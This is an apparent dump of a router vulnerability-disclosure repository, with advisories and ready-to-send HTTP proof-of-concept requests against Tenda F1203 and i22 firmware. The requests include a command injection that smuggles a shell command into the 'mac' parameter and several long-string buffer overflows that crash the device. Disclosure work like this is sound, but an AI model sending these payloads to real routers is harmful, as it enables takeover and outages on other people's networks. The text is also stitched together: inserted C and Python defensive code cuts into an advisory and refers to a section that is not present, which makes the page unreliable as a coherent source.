--------------------------------------------------------------------------------

# Tenda F1203 V2.0.1.6 was found to contain a command injection vulnerability in formWriteFacMac

## Description

`Tenda` Router **F1203 V2.0.1.6** was found to contain a command injection vulnerability in `formWriteFacMac`. This vulnerability allows an attacker to execute arbitrary commands through the "mac" parameter.
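As an added example, not code from the Double-q1015/CVE-vulns repository or from Tenda's firmware: a C sketch of the two handler defects this page describes, the WifiBasicSet `security` value copied with `strcpy` into a stack buffer (above) and the unvalidated `mac` value here, each beside a bounded, allow-list-validated replacement. The form-body parser, the buffer sizes, the function names and the verdict codes are assumptions made for the example.

```c
#include <ctype.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical buffer sizes chosen for this example; the advisories do not state them. */
#define SECURITY_MAX 32
#define MAC_STR_LEN 17

enum verdict { ACCEPT = 0, REJECT_MISSING, REJECT_TOO_LONG, REJECT_BAD_MAC };

/* Locate `key` in an application/x-www-form-urlencoded body: raw value, no copy. */
static const char *form_value(const char *body, const char *key, size_t *len) {
    size_t klen = strlen(key);
    const char *p = body;
    while (p && *p) {
        if (strncmp(p, key, klen) == 0 && p[klen] == '=') {
            const char *v = p + klen + 1;
            const char *end = strchr(v, '&');
            *len = end ? (size_t)(end - v) : strlen(v);
            return v;
        }
        p = strchr(p, '&');
        if (p) p++;
    }
    return NULL;
}

/* Percent-decode %XX into a bounded buffer; returns -1 rather than overrun outsz. */
static int url_decode(const char *in, size_t inlen, char *out, size_t outsz) {
    size_t o = 0;
    for (size_t i = 0; i < inlen; i++) {
        if (o + 1 >= outsz) return -1;
        if (in[i] == '%' && i + 2 < inlen &&
            isxdigit((unsigned char)in[i + 1]) && isxdigit((unsigned char)in[i + 2])) {
            char hex[3] = { in[i + 1], in[i + 2], '\0' };
            out[o++] = (char)strtol(hex, NULL, 16);
            i += 2;
        } else {
            out[o++] = in[i];
        }
    }
    out[o] = '\0';
    return (int)o;
}

/* The pattern the WifiBasicSet advisory describes: strcpy of the request value into a
 * fixed stack buffer, so a long value runs over the saved return address. Contrast only. */
void vulnerable_copy(const char *value) {
    char security[SECURITY_MAX];
    strcpy(security, value);
}

/* Shared front half of a hardened handler: locate, bound, then decode. */
static int bounded_param(const char *body, const char *key, char *out, size_t outsz) {
    size_t len;
    const char *v = form_value(body, key, &len);
    if (!v) return REJECT_MISSING;
    if (len >= outsz) return REJECT_TOO_LONG;  /* raw length bounds decoded length */
    if (url_decode(v, len, out, outsz) < 0) return REJECT_TOO_LONG;
    return ACCEPT;
}

/* Allow-list check for a MAC string: exactly "XX:XX:XX:XX:XX:XX" with hex digits,
 * so a shell metacharacter such as ';' can never pass, whatever follows it. */
int is_valid_mac(const char *s) {
    if (strlen(s) != MAC_STR_LEN) return 0;
    for (int i = 0; i < MAC_STR_LEN; i++) {
        if (i % 3 == 2 ? s[i] != ':' : !isxdigit((unsigned char)s[i])) return 0;
    }
    return 1;
}

/* Hardened WifiBasicSet-style handler: the value still lands in a fixed stack
 * buffer, but an over-long value is refused instead of written past the end. */
int security_verdict(const char *body) {
    char security[SECURITY_MAX];
    return bounded_param(body, "security", security, sizeof security);
}

/* Hardened WriteFacMac-style handler: decode first, then validate the decoded
 * value before it can reach anything that builds a command line from it. */
int mac_verdict(const char *body) {
    char mac[64];
    int v = bounded_param(body, "mac", mac, sizeof mac);
    if (v != ACCEPT) return v;
    return is_valid_mac(mac) ? ACCEPT : REJECT_BAD_MAC;
}

/* Build "security=" followed by n 'a' bytes, the shape of the repository's PoCs. */
int security_verdict_for_length(size_t n) {
    char *body = malloc(n + 10);
    if (!body) return -1;
    memcpy(body, "security=", 9);
    memset(body + 9, 'a', n);
    body[9 + n] = '\0';
    int v = security_verdict(body);
    free(body);
    return v;
}
```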
## Firmware information

* Manufacturer's address: https://www.tenda.com.cn/

* Firmware download address: https://www.tenda.com.cn/download/detail-2494.html

## Affected version

![image-20221201234503984](images/01.png)

## Vulnerability details

This vulnerability lies in the `/goform/WriteFacMac` page. The details are shown below:

![image-20221202010903295](images/02.png)

## POC

```
POST /goform/WriteFacMac HTTP/1.1
Host: 192.168.204.143
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user=admin
Connection: close
Content-Length: 4110

mac=00:01:02:11:22:33;echo%20hello
```

--------------------------------------------------------------------------------
/tenda_f1203/form_fast_setting_wifi_set/form_fast_setting_wifi_set.md:
--------------------------------------------------------------------------------

# Tenda F1203 V2.0.1.6 was discovered to contain a buffer overflow via the ssid parameter in the form_fast_setting_wifi_set function.

## Description

`Tenda` Router **F1203 V2.0.1.6** was discovered to contain a buffer overflow in the `httpd` module when handling the `/goform/fast_setting_wifi_set` request.

## Firmware information

* Manufacturer's address: https://www.tenda.com.cn/

* Firmware download address: https://www.tenda.com.cn/download/detail-2494.html

## Affected version

![image-20221201234503984](images/01.png)

## Vulnerability details

This vulnerability lies in the `/goform/fast_setting_wifi_set` page. The details are shown below:

![image-20221201234851524](images/02.png)

## POC

This POC can result in a DoS.

```
POST /goform/fast_setting_wifi_set HTTP/1.1
Host: 192.168.204.143
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user=admin
Connection: close
Content-Length: 2056

ssid=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
```

![image-20221201234916364](images/03.png)
--------------------------------------------------------------------------------
/tenda_i22/formSetAutoPing_ping2/formSetAutoPing_ping2.md:
--------------------------------------------------------------------------------
# Tenda i22 V1.0.0.3(4687) was discovered to contain a buffer overflow via the ping2 parameter in the formSetAutoPing function.

## Description

`Tenda` Router **i22 V1.0.0.3(4687)** was discovered to contain a buffer overflow in the `httpd` module when handling the `/goform/setAutoPing` request.

## Firmware information

* Manufacturer's address: https://www.tenda.com.cn/

* Firmware download address: https://www.tenda.com.cn/download/detail-2747.html

## Affected version

![image-20221120101953226](images/01.png)

## Vulnerability details

This vulnerability lies in the `/goform/setAutoPing` page. The details are shown below:

![image-20221120120736669](images/02.png)

## POC

This POC can result in a DoS.
26 | 27 | ``` 28 | POST /goform/setAutoPing HTTP/1.1 29 | Host: 192.168.204.133 30 | Content-Length: 1146 31 | Cache-Control: max-age=0 32 | Upgrade-Insecure-Requests: 1 33 | Origin: http://192.168.204.133 34 | Content-Type: application/x-www-form-urlencoded 35 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36 36 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 37 | Referer: http://192.168.204.133/system_hostname.asp?version=1487847846 38 | Accept-Encoding: gzip, deflate 39 | Accept-Language: zh-CN,zh;q=0.9 40 | Cookie: bLanguage=cn; password=jbl1qw; user= 41 | Connection: close 42 | 43 | linkEn=1&ping2=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 44 | ``` 45 | 46 | ![image-20221120121324270](images/03.png) 
--------------------------------------------------------------------------------
/tenda_i22/formWifiMacFilterSet/formWifiMacFilterSet.md:
--------------------------------------------------------------------------------
# Tenda i22 V1.0.0.3(4687) was discovered to contain a buffer overflow via the index parameter in the formWifiMacFilterSet function.

## Description

`Tenda` Router **i22 V1.0.0.3(4687)** was discovered to contain a buffer overflow in the `httpd` module when handling the `/goform/WifiMacFilterSet` request.

## Firmware information

* Manufacturer's address: https://www.tenda.com.cn/

* Firmware download address: https://www.tenda.com.cn/download/detail-2747.html

## Affected version

![image-20221120101953226](images/01.png)

## Vulnerability details

This vulnerability lies in the `/goform/WifiMacFilterSet` page. The details are shown below:

![image-20221120121943786](images/02.png)

## POC

This POC can result in a DoS.
26 | 27 | ``` 28 | POST /goform/WifiMacFilterSet HTTP/1.1 29 | Host: 192.168.204.133 30 | Content-Length: 2068 31 | Cache-Control: max-age=0 32 | Upgrade-Insecure-Requests: 1 33 | Origin: http://192.168.204.133 34 | Content-Type: application/x-www-form-urlencoded 35 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36 36 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 37 | Referer: http://192.168.204.133/system_hostname.asp 38 | Accept-Encoding: gzip, deflate 39 | Accept-Language: zh-CN,zh;q=0.9 40 | Cookie: bLanguage=cn; password=jbl1qw; user= 41 | Connection: close 42 | 43 | wl_radio=0&index=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 44 | ``` 45 | 46 | ![image-20221120113929418](images/03.png) -------------------------------------------------------------------------------- /tenda_i22/formWifiMacFilterSet/images/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_i22/formWifiMacFilterSet/images/01.png -------------------------------------------------------------------------------- /tenda_i22/formWifiMacFilterSet/images/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_i22/formWifiMacFilterSet/images/02.png -------------------------------------------------------------------------------- /tenda_i22/formWifiMacFilterSet/images/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_i22/formWifiMacFilterSet/images/03.png 
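Added here as a defender-side example, not code from the CVE-vulns repository or the advisories: a small request-inspection routine of the kind an inline proxy or IDS preprocessor would run, which parses a raw HTTP POST and flags any form parameter sent to the Tenda i22 `/goform` handlers named in these advisories whose value is far longer than the page could legitimately need. The 256-byte threshold, the `192.0.2.1` host and the sample requests are constructed assumptions.

```python
"""Flag oversized form parameters sent to Tenda /goform handlers.

Added detection example (not part of the original advisories). It parses a raw
HTTP request the way an inline proxy or IDS preprocessor would and reports any
application/x-www-form-urlencoded parameter whose decoded value is longer than
a threshold. The handler paths and parameter names come from the advisories on
this page; the 256-byte threshold is an assumption chosen to sit well below the
PoC payload sizes while leaving room for any realistic configuration value.
"""
from dataclasses import dataclass
from urllib.parse import parse_qsl, urlsplit

# Handlers named in the advisories and the parameter each PoC overflows.
WATCHED_HANDLERS = {
    "/goform/setAutoPing": "ping2",
    "/goform/WifiMacFilterSet": "index",
    "/goform/wifiSSIDget": "index",
    "/goform/wifiSSIDset": "index",
}
MAX_VALUE_LEN = 256  # assumption: legitimate values on these pages are far shorter


@dataclass(frozen=True)
class Finding:
    path: str
    param: str
    length: int
    watched: bool  # True when the parameter is the one the advisory names


def parse_request(raw: bytes):
    """Split a raw HTTP/1.1 request into (method, path, headers, body)."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:  # tolerate bare-LF captures
        head, sep, body = raw.partition(b"\n\n")
    lines = head.decode("latin-1").splitlines()
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    # Honour Content-Length when present so trailing bytes are not parsed.
    try:
        body = body[: int(headers.get("content-length", len(body)))]
    except ValueError:
        pass  # malformed header: fall back to the whole captured body
    return method, urlsplit(target).path, headers, body


def find_oversized_params(raw: bytes, max_len: int = MAX_VALUE_LEN):
    """Return a Finding for every parameter whose value is longer than max_len.

    Only form-encoded POSTs to watched /goform handlers are examined; any other
    traffic yields an empty list.
    """
    method, path, headers, body = parse_request(raw)
    if method != "POST" or path not in WATCHED_HANDLERS:
        return []
    if not headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        return []
    findings = []
    # keep_blank_values so an empty parameter still counts as present
    for name, value in parse_qsl(body.decode("latin-1"), keep_blank_values=True):
        if len(value) > max_len:
            findings.append(Finding(path, name, len(value), name == WATCHED_HANDLERS[path]))
    return findings


def build_request(path: str, body: str) -> bytes:
    """Constructed request in the shape of the PoCs above (host is a placeholder)."""
    return (
        f"POST {path} HTTP/1.1\r\n"
        "Host: 192.0.2.1\r\n"  # TEST-NET placeholder, not a real device
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(body)}\r\n"
        "Connection: close\r\n\r\n"
        f"{body}"
    ).encode()


if __name__ == "__main__":
    # Constructed samples: one benign, one shaped like the ping2 PoC.
    benign = build_request("/goform/setAutoPing", "linkEn=1&ping2=8.8.8.8")
    oversized = build_request("/goform/setAutoPing", "linkEn=1&ping2=" + "A" * 1131)
    print(find_oversized_params(benign))     # []
    print(find_oversized_params(oversized))  # one Finding on ping2, watched=True
```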
--------------------------------------------------------------------------------
/tenda_i22/formwrlSSIDget/formWifiMacFilterGet.md:
--------------------------------------------------------------------------------
# Tenda i22 V1.0.0.3(4687) was discovered to contain a buffer overflow via the list parameter in the formwrlSSIDget function.

## Description

`Tenda` Router **i22 V1.0.0.3(4687)** was discovered to contain a buffer overflow in the `httpd` module when handling the `/goform/wifiSSIDget` request.

## Firmware information

* Manufacturer's address: https://www.tenda.com.cn/

* Firmware download address: https://www.tenda.com.cn/download/detail-2747.html

## Affected version

![image-20221120101953226](images/01.png)

## Vulnerability details

This vulnerability lies in the `/goform/wifiSSIDget` page. The details are shown below:

![image-20221120115629192](images/02.png)

## POC

This POC can result in a DoS.

```
POST /goform/wifiSSIDget HTTP/1.1
Host: 192.168.204.133
Content-Length: 2068
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.204.133
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.204.133/system_hostname.asp?version=1487847846
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: bLanguage=cn; password=jbl1qw; user=
Connection: close

wl_radio=0&index=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 44 | ``` 45 | 46 | ![image-20221120113929418](images/03.png) -------------------------------------------------------------------------------- /tenda_i22/formwrlSSIDget/images/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_i22/formwrlSSIDget/images/01.png -------------------------------------------------------------------------------- /tenda_i22/formwrlSSIDget/images/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_i22/formwrlSSIDget/images/02.png -------------------------------------------------------------------------------- /tenda_i22/formwrlSSIDget/images/03.png: -------------------------------------------------------------------------------- 